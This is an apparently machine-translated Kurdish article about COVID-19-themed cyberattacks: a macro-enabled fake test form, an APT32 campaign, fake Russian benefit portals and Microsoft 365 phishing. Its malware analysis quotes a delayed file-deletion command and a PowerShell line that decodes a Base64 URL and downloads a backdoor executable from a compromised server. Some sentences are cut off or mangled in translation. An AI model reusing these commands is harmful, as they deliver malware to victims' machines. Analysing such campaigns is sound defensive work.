Êrîşker berdewam dikin ku mijara COVID-19 bikar bînin, ji bo bikarhênerên ku bi dilşikestî bi her tiştê ku bi serhildanê ve girêdayî ne re metirsiyan diafirînin. LI
Bi bîr bîne
Ma hûn ji bo COVID-19 ceribandinek belaş dixwazin?
Nimûneyek din a girîng a fîşekirina bi mijara coronavirus bû
Qanikirina pir bikarhêneran ji bo çalakkirina makroyan jî hêsan bû. Ji bo kirina vê yekê, hîleyek standard hate bikar anîn: ji bo dagirtina pirsnameyê, hûn pêşî hewce ne ku makroyan çalak bikin, ku tê vê wateyê ku hûn hewce ne ku skrîptek VBA bimeşînin.
Wekî ku hûn dikarin bibînin, skrîpta VBA bi taybetî ji antivirusan tê mask kirin.
Windows xwedan taybetmendiyek bendewariyê ye ku serîlêdan li bendê ye /T <çirk> berî ku bersiva xwerû "Erê" qebûl bike. Di rewşa me de, berî ku pelên demkî jêbirin, skrîpt 65 çirke li bendê ma:
cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:UsersPublictmpdirtmps1.bat & del C:UsersPublic1.txt
Û dema ku li bendê bû, malware hate dakêşandin. Ji bo vê yekê skrîptek PowerShell ya taybetî hate destpêkirin:
cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]: :FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:UsersPublic1.txt
Piştî deşîfrekirina nirxa Base64, skrîpta PowerShell paşperdeya ku li ser servera webê ya berê hatî hackkirin ji Almanyayê dadixe:
http://automatischer-staubsauger.com/feature/777777.png
û wê di bin navê de tomar dike:
C:UsersPublictmpdirfile1.exe
peldanka ‘C:UsersPublictmpdir’
dema ku pela 'tmps1.bat' ya ku ferman dihewîne tê jêbirin cmd /c mkdir ""C:UsersPublictmpdir"".
Li dijî saziyên dewletê êrîşeke armanckirî pêk hat
Wekî din, analîstên FireEye herî dawî êrîşek APT32 ya armanckirî ragihand ku armanc li avahiyên hukûmetê yên li Wuhan, û her weha Wezareta Rêvebiriya Lezgîn a Chineseînî ye. Yek ji RTF-yên belavbûyî lînka gotarek New York Times a bi sernavê hebû
Balkêş e, li gorî Virustotal, di dema tespîtkirinê de, yek ji antivirusan ev mînak nedît.
Dema ku malperên fermî dakêşin
Nimûneya herî berbiçav a êrîşa fîshingê çend roj berê li Rûsyayê qewimî. Sedema vê yekê ji bo zarokên di navbera 3 û 16 salî de tayînkirina feydeyek ku demek dirêj dihat hêvîkirin bû. Dema ku destpêka pejirandina serîlêdanan di 12ê Gulana 2020-an de hate ragihandin, bi mîlyonan ji bo arîkariya dirêj-hêvî li malpera Karûbarên Dewletê bazdan û portal ji êrîşek DDoS-ya profesyonel ne xirabtir anîn xwarê. Dema ku serokkomar got ku "Xizmetên Hikûmetê nikarîbûn bi herikîna serlêdanan re rû bi rû bimînin", mirovan dest bi axaftina serhêl li ser vekirina malperek alternatîf ji bo qebûlkirina serlêdanan kir.
Pirsgirêk ev e ku çend malperan bi yekcarî dest bi xebatê kirin, û dema ku yek, ya rastîn li posobie16.gosuslugi.ru, bi rastî serlêdanan qebûl dike, bêtir
Hevalên SearchInform li herêma .ru nêzî 30 domainên sextekar ên nû dîtin. Pargîdaniya Infosecurity û Softline ji destpêka Nîsanê ve zêdetirî 70 malperên karûbarê hukûmetê yên sexte yên mîna hev şopandine. Afirînerên wan sembolên nas manîpule dikin û di heman demê de berhevokên peyvên gosuslugi, gosuslugi-16, vyplaty, covid-vyplaty, posobie, û hwd.
Hype û endezyariya civakî
Hemî van mînakan tenê piştrast dikin ku êrîşkar bi serfirazî ji mijara coronavirus drav didin. Û her ku tansiyona civakî bilindtir bibe û pirsgirêkên nezelaltir be, şansên sextekar jî ew qas zêdetir in ku daneyên girîng didizin, mirovan neçar dikin ku dev ji dravê xwe berdin, an jî bi tenê bêtir komputeran hack bikin.
Û ji ber ku pandemîk neçar kiriye ku mirovên potansiyel ne amade ne ku bi girseyî ji malê bixebitin, ne tenê daneyên kesane, lê di heman demê de daneyên pargîdanî jî di xetereyê de ne. Mînakî, di van demên dawî de bikarhênerên Microsoft 365 (berê Office 365) jî rastî êrîşek phishing hatin. Mirov peyamên dengî yên girseyî yên "bêndabûyî" wekî pêvekên tîpan distînin. Lêbelê, pel bi rastî rûpelek HTML-ê bûn ku mexdûrên êrîşê şandin
Source: www.habr.com